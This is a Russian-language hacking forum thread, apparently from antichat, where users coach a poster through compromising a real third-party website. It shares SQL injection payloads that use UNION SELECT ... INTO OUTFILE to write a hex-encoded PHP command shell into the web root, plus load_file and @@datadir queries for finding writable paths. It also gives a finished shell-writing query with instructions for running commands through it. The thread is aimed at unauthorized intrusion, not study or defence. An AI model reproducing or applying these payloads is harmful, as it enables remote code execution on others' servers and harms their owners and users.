GOGA075 твой шелл shell.php?cmd=passthru('system commands'); мое предложениe shell.php?cmd=system commands
sss) И? Воспроизводится тоже с глюками? Или работает, но вас смущает вывод ошибки? Или вы думаете поселить шелл навечно в факе?) Загрузить нужное файло в другое место (из шелла) религия не позволяет?
Я не такой уж дебил шоб шелы там оставлять... А эта ошибка нидает нормально работать шелу. Там на какую ссылку не ткни такая ошибка и скрипт не выполняется дальше!!
вот всё, что сверху в шеле написано, пока вы ничего не тыкаете (на ссылки, после чего шелл, зараза, отказывается работать), сюда выложите плз. А заодно посмотрите папочки, которые зелененькие. Так же не мешало бы для начала вместо кода шелла вставить код, воспроизводящий phpinfo, и внимательно там почитать, т.к. скорее что-то там точно ON и disabled
Вот сама ошибка сервер работает под Linux В принципе вапрос решился сам собой, после удаления куки админа!
Спасибо.. Посидел почитал ... понял что за бред написал ( Буду курить менче ) Воспользовался советами : Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись Попробовал залить в категорию :/var/lib/mysql/ipw18/ следующим образам 6+union+select+0x3c3f7068702073797374656d28245f4745545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+ На что мне ругнулся сайт, значит всё норм .... теперь не могу догнать как его прочесть ? пробовал www.site.com/2.php?cmd=dir .. но нифига Решил попробовать пойти другим путем: union+select+0x3c3f7068702073797374656d28245f4745545b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+ здесь тодзе вопрос, ww.site.com/????? (нужна cmd) Народ я хоть в правильном направление двигаюсь ?
/tmp/ - директория не доступная с веба. Если льете в нее, то необходим lfi, что-бы этот файл проинклудить и выполнить. Насчет www.site.com/2.php?cmd=dir, а файл то создался? Если файл создался, но выполнения команд нету, то скорее всего, вы залили неверное содержимое.
Спс в /var/lib/mysql/ipw18/www/ нельзя делать запись. (Can't create/write to file '/var/lib/mysql/ipw18/www/2.php' (Errcode: 2) По поводу local file include.. где можна с этим ознакомится .. в googl.ru ничего покачто не нашел (что мог бы переварит и понять ) Куда еще можна залить шелл кроме как ('site/www') или ('tmp') Для меня это тёмный лес покачто, если есть статья то поделитесь люди добрые (link)
http://forum.antichat.ru/nextnewesttothread30606.html https://forum.antichat.net/showthread.php?p=188561
Конечно туда "нельзя делать запись". Ведь этой диры нету, и (Errcode: 2) как раз об этом говорит тебе. Было-бы удивительно если-бы она там оказалась =\ С каких дел в дирректории мускула какой-то мудак будет размещать веб? Где ты берёшь эти чудопути?
To Konqi , спс ! To Jokester короче сделал запрос : union+select+@@datadir+--+ в ответ мне выдало : /var/lib/mysql/ipw18/ ----------- вот с чего я начал :union+select+version()+into+outfile+'/tmp/1.txt+--+ мне выдало : Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/code/page_functions.php on line 40 дальше: union+select+load_file('/tmp/1.txt')+--+ мне выдало : version 5............. ------------- к чему я это все, каким образом мне узнать директорию куда надо залить шелл для его чтения в виде site.ru/shell?cmd=dir .... ну или как поступить ? не ругайся насяльника Jokester
/hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/ вот сам же полный путь и скрыл значить в курсе что это путь до веба ? ))
короче если сделаешь так union+select+version()+into+outfile+"/hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/version.txt"+--+ если есть права на запись , если нет ищи другие папки то в вебе можешь вызвать site.com/version.txt и все а вместо этого файла можешь залить полноценный шелл .... ====== допустим название твоего сайта XXXL.com тогда делаем так +and+1=0+Union+Select+NULL,NULL,NULL,NULL"<? system($_REQUEST['cmd']); ?>",NULL,NULL+INTO+OUTFILE "/hermes/bosweb/web292/b2929/XXXL.com/public_html/XXXL.com/shell.php" после вызовем www.XXXL.com/shell.php?cmd=dir или ls смотря какая ОС
shell_c0de Синтаксис только поправь в запросах (кавычки и слеши), а то он так никогда не разберётся И да, ось там разумеется unixlike, это по путям видно
